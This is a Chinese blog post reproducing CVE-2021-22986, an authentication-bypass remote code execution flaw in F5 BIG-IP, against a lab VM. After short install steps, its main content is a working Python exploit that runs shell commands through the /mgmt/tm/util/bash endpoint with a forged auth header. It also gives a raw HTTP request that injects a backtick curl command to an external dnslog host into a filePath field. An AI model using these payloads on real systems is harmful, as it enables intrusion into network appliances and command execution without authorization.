CVE-2021-22986 F5 BIG-IP 远程代码漏洞复现

作者: print("") 分类: 漏洞复现 发布时间: 2021-03-19 12:50

一、安装F5 BIG-IP

https://downloads.f5.com/esd/eula.sv?sw=BIG-IP&pro=big-ip_v16.x&ver=16.0.1&container=16.0.1_Virtual-Edition&path=&file=&B1=%26%2325105%3B%26%2325509%3B%26%2321463%3B

下载之后。刷双击那个文件。就能安装 安装完之后呢。设置一下密码

设置密码之后,查看一下你的IP

进行访问

用户名是admin  密码是刚刚在上面设置的强密码。然后登陆进去修改一下密码即可。然后进行登陆

这里安装已经完成了。

参考:https://blog.riskivy.com/f5%e4%bb%8e%e8%ae%a4%e8%af%81%e7%bb%95%e8%bf%87%e5%88%b0%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c%e6%bc%8f%e6%b4%9e%e5%88%86%e6%9e%90/

exp:

#!/usr/bin/python
# coding: UTF-8
import requests

proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
def check(target):
        headers = {
            "X-F5-Auth-Token": "",
            "Authorization": "Basic YWRtaW46QVNhc1M="
        }
        check = b"tm:sys:global-settings:global-settingsstate"
        url = target + "/mgmt/tm/util/bash"
        json22={"command":"run","utilCmdArgs":"-c id"}
        try:
            conn = requests.post(url, headers=headers,json=json22,proxies=proxies,verify=False).json()
            print conn['commandResult']
        except:
            print("出现错误!!!!")

check("https://192.168.1.129")

还有一个接口可以实现代码执行

POST /mgmt/tm/access/bundle-install-tasks HTTP/1.1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept: */*
Authorization: Basic YWRtaW46
X-F5-Auth-Token: 
User-Agent: Ruby
Host: 192.168.1.129
Content-Length: 45
Connection: close

{"filePath":"`curl whoami.sb1j1b.dnslog.cn`"}

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论

电子邮件地址不会被公开。 必填项已用*标注